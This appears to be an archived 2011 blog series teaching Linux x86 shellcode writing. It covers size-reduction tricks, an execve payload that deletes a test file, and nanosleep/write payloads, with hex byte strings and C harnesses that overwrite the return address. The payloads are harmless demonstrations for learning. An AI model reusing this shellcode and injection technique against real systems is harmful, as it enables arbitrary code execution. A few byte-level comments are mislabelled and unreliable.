MicroMike: shell code

Showing posts with label shell code. Show all posts

Oct 31, 2011

shell code 6(reduced the shellcode size)

The size of shellcode is very important. Therefore I list some of the tricks that can reduce the shellcode size and moreover rewirte our shellcode to reduce the size.

1.
Instead of using movl $constant , %register, use xor, mul and lea instead. The instruction of moving constant to register cost five bytes, but xor, mul and lea only cost 1 to 3 bytes. This can reduce many size of the shellcode.

The following is a quick example for the exit system call.
This is the original one that I write in the previous articles.

int main() {
  __asm__("movw $1, %eax;\
           movw $0, %ebx;\
           int $0x80;");
  return 0;
}

The size of each instruction is

mov $1, %eax      => 5 bytes.

mov $0, %ebx      => 5 bytes.

int $0x80         => 2 bytes.

------------------------------------ 

total bytes          12 bytes.

However if rewrite the shellcode into the following code:

int main() {
  __asm__("xorl %ebx, %ebx;\
           leal 0x1(%ebx), %eax;\
           int $0x80;");
  return 0;
}

The size of the shellcode become:

xorl %ebx, %ebx      => 2 bytes

leal 0x1(%ebx), %eax => 3 bytes

int $0x80            => 2 bytes

 --------------------------------------------

total size              7 bytes

yes, reduce 5 bytes of the shellcode. :D

another example of reducing the shellcode:

int main(){
        __asm__("jmp 0x20;\                 #2bytes
                 popl %esi;\                #1bytes
                 movl $4,%eax;\             #5bytes
                 movl $1,%ebx;\             #5bytes
                 movl $0x7,%edx;\           #5bytes
                 movl %esi,%ecx;\           #2bytes
                 int  $0x80;\               #2bytes
                 movl $1,%eax;\             #5bytes
                 movl $0,%ebx;\             #5bytes
                 int  $0x80;\               #2bytes
                 call -0x37;\               #5bytes
                 .string "Run Han"\
                 ");
        return 0;
}

This code is the write system call that I wrote in the previous article.

The code size of this shellcode is 46 bytes long.

rewrite the shellcode

__asm__("jmp 0x20;\                 #2bytes
                 popl %ecx;\                #1bytes
                 xorl %ebx, %ebx;\          #2bytes
                 mul %ebx;\                 #2bytes
                 leal 0x4(%eax),%eax;\      #3bytes
                 leal 0x7(%edx),%edx;\      #3bytes
                 int  $0x80;\               #2bytes
                 xorl %ebx, %ebx;\          #2bytes
                 leal 0x1(%ebx), %eax;\     #3bytes
                 int  $0x80;                #2bytes
                 call -0x37;\               #5bytes
                 .string "Run Han"\       #7bytes
                 ");

The code size is reduce to 34 bytes long.

P.S the mul instruction will save the result to %eax and %edx, therefore the %eax and %edx is now being set to zero.

The push trick and relative jmp/call trick both can get the address of the data, but sometimes using the push trick in the right condition can reduce some bytes of the shellcode.
consider the following example in shell code 3:

int main(){
        /* relative jmp/call trick */
        __asm__("jmp 2f;\n\
                 1:;\n\
                 pop %esi;\n\
                 movl %esi, %ebx;\n\
                 movl $0, %ecx;\n\
                 movl $162, %eax;\n\
                 int  $0x80;\n\
                 movl $1,%eax;\n\
                 movl $0,%ebx;\n\
                 int  $0x80;\n\
                 2:;\n\
                 call 1b;\n\
                 .long 0x00000002,0x0;\n\
                 ");
        return 0;
}

The above code is 42 bytes.

int main(){
        /* push trick */
        __asm__("push $0;\n\
                 push $2;\n\
                 movl %esp, %ebx;\n\
                 movl $0, %ecx;\n\
                 movl $162, %eax;\n\
                 int  $0x80;\n\
                 movl $1,%eax;\n\
                 movl $0,%ebx;\n\
                 int  $0x80;\n\               
                 ");
        return 0;
}

The code size is 30 bytes.
By using the push trick, we reduced 12 bytes of the shellcode. Nice!!!

3.
The 0x66 prefix or 16bit/8bit mov instruction.
If the constant value is smaller than 0xffff using the 0x66 prefix or movw instruction in gnu assember. In this way, it can reduce one more byte of the shellcode.
If the constant value is smaller than 0xff using the movb instruction since it only cost two bytes.
Rewrite the previous example:

int main(){
        /* push trick */
        __asm__("push $0;\n\
                 push $2;\n\
                 movl %esp, %ebx;\n\
                 xorl %ecx, %ecx;\n\
                 mov  $162, %al;\n\
                 int  $0x80;\n\
                 xorl %ebx, %ebx;\n\
                 leal 0x1(%ebx), %eax;\n\
                 int  $0x80;\n\               
                 ");
        return 0;
}

The size of the above code is reduce to 19 bytes.
Reduce 11 bytes of the code.
Now the wait system call and exit system call only cost 19 bytes instead of 42 bytes.

These tricks is very useful in some conditions, enjoy. :D

Jul 4, 2011

Shell code 5(execve system call)

This article is mainly reference by this website:
smash the stack for fun and profit
This time I'll use execve system call to remove a file called "test".
Before started, let's see how execve works in c.
the man page of execve

#include <unistd.h>
       int execve(const char *filename, char *const argv[],
                  char *const envp[]);

As you can see, there are three formal parameters in execve system call.
1. the filename is the file you want to execute.
2. argv is an array of argument strings passed to the new program.
3. the last one is not important in our shellcode, so I will not explain it in detail.
Let's write a simple C program which use the execve system call.
execve_pre.c

#include <unistd.h>
int main(){
        char *argv[]={"/bin/rm","./test",NULL};
        execve(argv[0],argv,NULL);
        return 0;
}

compile the program and execute with the following command.

1.gcc -o exe.out execve_pre.c

2.touch test

P.S the touch command is to create a empty file.

3. ./exe.out

And you will see the "test" is being removed.

Now turn this into the inline assembly.

execve.c

char *argv[]={"/bin/rm","./test",NULL};
int main(){
        __asm__("movl $0xb,%eax;\
                 movl argv,%ebx;\
                 movl $argv,%ecx;\
                 movl $0,%edx;\
                 int $0x80;\
                 movl $0x1,%eax;\
                 movl $0x0,%ebx;\
                 int $0x80;\
                 ");
        return 0;
}

Compile and execute it.

The result is the same as the previous example.

However, as I mentioned before, I don't want the data outside the shellcode.

Therefore, I need to write the data into the shell code.

And the way I get the address of the data is still the same, the relative jmp/call trick.

The following is the code looks like:

execve2.c

int main(){
        __asm__("jmp 2f;\n\
                 1:;\n\
                 xor %eax,%eax;\n\
                 popl %esi;\n\               
                 movl %esi,%ebx;\n\
                 leal 0x8(%esi),%esi;\n\
                 pushl %eax;\n\
                 pushl %esi;\n\
                 pushl %ebx;\n\               
                 movl $0xb,%eax;\n\
                 movl %esp,%ecx;\n\
                 xorl %edx,%edx;\n\
                 int $0x80;\n\
                 movl $0x1,%eax;\n\
                 movl $0x0,%ebx;\n\
                 int $0x80;\n\
                 2:;\n\
                 call 1b;\n\
                 .string \"/bin/rm\";\n\
                 .string \"./test\";\n\
                 .byte 0x0,0x0,0x0,0x0;\n\
                 ");
        return 0;
}

In order to create a structure like

char *argv[]={"/bin/rm","./test",NULL};

I use the stack to store those data.
1. we get the address of "/bin/rm" by the relative jmp/call trick and pop to the %esi.
2. copy the content of the %esi to %ebx.
3. leal 0x8(%esi), %esi => %esi += 8;
After the instruction, %esi now point to the "./test"
4. push 0, address of the "./test" and address of the "/bin/rm".
P.S since the stack grows down, push the parameter in reverse order. The memory layout is list in figure 1.

<figure 1> 

low ------------------------------------------ high

|address of "/bin/rm"| address of "./test" | NULL

| %ebx               | %esi                | %eax

After doing the above steps, then I can move the parameter to the register which the int $80 need.

1. since the %ebx alrealy contains the address of the structure, there is no need to set it again.

2. movl %esp,%ecx;

store the address of the structure to the %ecx. This instruction is equal to execve(argv[0],argv,NULL);

3. xorl %edx, %edx;

store the NULL pointer to the %edx. This instruction is equal to execve(argv[0],argv,NULL);

And now it's time to compile the source code and execute it.

Use objdump to copy the machine code to the new source file. (If you have no idea how to use it see the previous post of the shell code)

execve3.c

/* This is the shellcode */
char shellcode[] =
"\xeb\x22"
"\x31\xc0"
"\x5e"
"\x89\xf3"
"\x8d\x76\x08"
"\x50"
"\x56"
"\x53"
"\xb8\x0b\x00\x00\x00"
"\x89\xe1"
"\x31\xd2"
"\xcd\x80"
"\xb8\x01\x00\x00\x00"
"\xbb\x00\x00\x00\x00"
"\xcd\x80"
"\xe8\xd9\xff\xff\xff"
"/bin/rm\x0"
"./test\x0"
"\x00\x00\x00\x00";

void main() {
   int *ret;
   /* overflow the return address */
   ret = (int *)&ret + 2;
   (*ret) = (int)shellcode;
}

Compile the source code, use execstack to enable the executable stack and execute it, you will see the result is what we expected.

Actually the execve system call is very dangerous. The above is just using the /bin/rm to remove a file, what if someone use /bin/sh to create a new shell, the consequence is unpredictable.

After verified the result, let's now combine the whole code together.

All.c

/* 
 * The inline assembly mix all the code together.
 * It will print a message,
 * wait 2 seconds and
 * remove a file called test.
 */
int main(){
        __asm__("jmp 2f;\n\
                 1:;\n\
                 popl %esi;\n\
                 movl %esi, %ecx;\n\
                 xorl %ebx, %ebx;\n\
                 mul %ebx;\n\
                 inc %ebx;\n\
                 movb $0x4, %al;\n\
                 movb $0x8, %dl;\n\
                 int  $0x80;\n\
                 xorl %eax, %eax;\n\
                 pushl %eax;\n\
                 movb $0x2, %al;\n\
                 pushl %eax;\n\
                 movl %esp, %ebx;\n\
                 xor %ecx, %ecx;\n\
                 movb $0xa2, %al;\n\
                 int  $0x80;\n\
                 xorl %eax, %eax;\n\
                 leal 0x9(%esi),%esi;\n\
                 pushl %eax;\n\
                 movl %esi, %ebx;\n\
                 leal 0x8(%esi), %esi;\n\
                 pushl %esi;\n\
                 pushl %ebx;\n\
                 movb $0xb, %al;\n\
                 movl %esp, %ecx;\n\
                 xor %edx, %edx;\n\
                 int $0x80;\n\
                 xorl %ebx, %ebx;\n\
                 leal 0x1(%ebx), %eax;\n\
                 int $0x80;\n\
                 2:;\n\
                 call 1b;\n\
                 .string \"Run Han!\"\n\
                 .string \"/bin/rm\";\n\
                 .string \"./test\";\n\
                 .long 0x0;\n\
                ");
        return 0;
}

There is nothing much to tell of the source code. I use some instruction to reduce the code size, I will talk about reduce the code size in the next article.

And now compile the source code and use objdump to generate the shellcode.

All_shell.c

char shellcode[] =
"\xeb\x39"      /*relative jmp*/
"\x5e"          /*pop %esi*/
"\x89\xf1"      /*movl %esi, %ecx*/
"\x31\xdb"      /*xor %ebx, %ebx*/
"\xf7\xe3"      /*mul %ebx*/
"\x43"          /*inc %ebx*/
"\xb0\x04"      /*mov $0x4, %al*/
"\xb2\x08"      /*mov $0x8, %dl*/
"\xcd\x80"      /*int $0x80*/
"\xb0\x02"      /*xor %eax, %eax*/
"\x50"          /*pushl %eax*/
"\xb0\x02"      /*movb $2, %al*/
"\x50"          /*pushl %eax*/
"\x89\xe3"      /*movl %esp, %ebx*/
"\x31\xc9"      /*xor %ecx, %ecx*/
"\xb0\xa2"      /*mov $0xa2, %al*/
"\xcd\x80"      /*int $0x80*/
"\x31\xc0"      /*xor %eax, %eax*/
"\x8d\x76\x09"  /*leal 0x09(%esi),%esi*/
"\x50"          /*push %eax*/
"\x89\xf3"      /*mov %esi, %ebx*/
"\x8d\x76\x08"  /*lea 0x8(%esi), %esi*/
"\x56"          /*push %esi*/
"\x53"          /*push %ebx*/
"\xb0\x0b"      /*mov $0xb, %al*/
"\x89\xe1"      /*mov %esp, %ecx*/
"\x8d\x51\x04"  /*lea 0x4(%esp), %edx*/
"\xcd\x80"      /*int $0x80*/
"\x31\xdb"      /*xor %ebx, %ebx*/
"\x8d\x43\x01"  /*lea 0x1(%ebx), %eax*/
"\xcd\x80"      /*int $0x80*/
"\xe8\xc2\xff\xff\xff"  /*relative call*/
"Run Han!\x0"
"/bin/rm\x0"
"./test\x0"
"\x00\x00\x00\x00";

void main() {
   int *ret;
   ret = (int *)&ret + 2;
   (*ret) = (int)shellcode;

}

compile it , use execstack to enable the executable stack and execute it. After that you will see the program first print a message, wait about two seconds and remove a file called "test".

Jul 2, 2011

Shell code 4(another trick)

By far, the shell code can print a message and exit the program normally.
Now I add a new feature in the previous shell code program. That is let the program wait 2 seconds and then exit.

In order to do this, I need to use a new system call called "nanosleep". (my OS is ubuntu 10.10)
use the following command to see what nanosleep do:
man nonosleep

#include <time.h>
int nanosleep(const struct timespec *req, struct timespec *rem);
....
struct timespec {
               time_t tv_sec;        /* seconds */
               long   tv_nsec;       /* nanoseconds */
           };

P.S since I write a simple program to see the size of the timespec, and also the size of each fields. the time_t type is 4 bytes and long is 4 bytes, so the timespec is totally 8 bytes long.
Tips: you can write a C program that use the "sizeof()" MACRO to see the size of each type of variable.
The above are the information that I needed.

Now, as usual, write an inline assembly program.
sleep1.c

/*the time_spec structure*/
char t1_v[]="\x02\x00\x00\x00\x00\x00\x00\x00";
int main(){
        __asm__("movl $t1_v, %ebx;\
                 movl $0, %ecx;\
                 movl $162, %eax;\
                 int  $0x80;\
                 movl $1,%eax;\
                 movl $0,%ebx;\
                 int  $0x80;\
                 ");
        return 0;
}

Compile the source code and execute it, you will see that the program actually wait about 2 seconds then exit.
However, just like the previous post: Shell code 3(cont.) I don't want the data is outside the shell code. Therefore, I use the same trick, the relative jmp/call trick, mentioned in the previous post.
sleep2.c

int main(){
        /* relative jmp/call trick */
        __asm__("jmp 2f;\n\
                 1:;\n\
                 pop %esi;\n\
                 movl %esi, %ebx;\n\
                 movl $0, %ecx;\n\
                 movl $162, %eax;\n\
                 int  $0x80;\n\
                 movl $1,%eax;\n\
                 movl $0,%ebx;\n\
                 int  $0x80;\n\
                 2:;\n\
                 call 1b;\n\
                 .long 0x00000002,0x0;\n\
                 ");
        return 0;
}

Compile the source code and test the result. (It works :D )

Instead of using relative jmp/call trick to get the address of the data, is there any other way to get the address too?
Why not just push the parameter to the stack, and the %esp will content the address of our data. Let's use this push trick to write our code.
sleep3.c

int main(){
        /* push trick */
        __asm__("push $0;\n\
                 push $2;\n\
                 movl %esp, %ebx;\n\
                 movl $0, %ecx;\n\
                 movl $162, %eax;\n\
                 int  $0x80;\n\
                 movl $1,%eax;\n\
                 movl $0,%ebx;\n\
                 int  $0x80;\n\               
                 ");
        return 0;
}

P.S remember that the stack grow down, therefore push the data in reverse order.
Before writing the shellcode, I add the write system call into the inline assembly.
sleep4.c

/*
 * In this example I use both the 
 * relative jmp/call trick and
 * push trick to get the data.
 */
int main(){
        __asm__("jmp 2f;\n\
                 1:;\n\
                 popl %esi;\n\
                 movl $4,%eax;\n\
                 movl $1,%ebx;\n\
                 movl $0x7,%edx;\n\
                 movl %esi,%ecx;\n\
                 int  $0x80;\n\
                 push $0;\n\
                 push $2;\n\
                 movl %esp, %ebx;\n\
                 movl $0, %ecx;\n\
                 movl $162, %eax;\n\
                 int  $0x80;\n\
                 movl $1,%eax;\n\
                 movl $0,%ebx;\n\
                 int  $0x80;\n\
                 2:;\n\
                 call 1b;\n\
                 .string "Run Han";\n\
                ");
        return 0;
}

This is how the inline assembly looks like, it is pretty big now.

Again, compile the source code and test the result. If everything is correct, you will see the message and wait about 2 seconds then exit the program.
If everything works fine, objdump the binary files.

Copy the machine code and paste into another source file as the shellcode.
sleep5.c
/* This is the shellcode */

/* This is the shellcode */
char shellcode[]=
"\xeb\x32"
"\x5e"
"\xb8\x04\x00\x00\x00"
"\xbb\x01\x00\x00\x00"
"\xba\x07\x00\x00\x00"
"\x89\xf1"
"\xcd\x80"
"\x6a\x00"
"\x6a\x02"
"\x89\xe3"
"\xb9\x00\x00\x00\x00"
"\xb8\xa2\x00\x00\x00"
"\xcd\x80"
"\xb8\x01\x00\x00\x00"
"\xbb\x00\x00\x00\x00"
"\xcd\x80"
"\xe8\xc9\xff\xff\xff"
"Run Han";
int main(){
        int *ptr;
        int i;
        /* 
         * overflow the return address
         * transfer the execution flow to shellcode
         */
        for(i=0;i<10;i++){
                ptr = (int*)&ptr+i;
                *(ptr) = (int)shellcode;
        }
        return 0;
}

Compile the source code and use execstack to enable the executable stack.
gcc -g -o sleep4.out sleep4.c
execstack -s sleep4.out
execute the program and check the result is what we expected.
Moreover, you can even use gdb to see the result.

Result:

reference website:http://www.governmentsecurity.org/forum/topic/19441-reduce-shellcode-by-4-bytes/

MicroMike

Article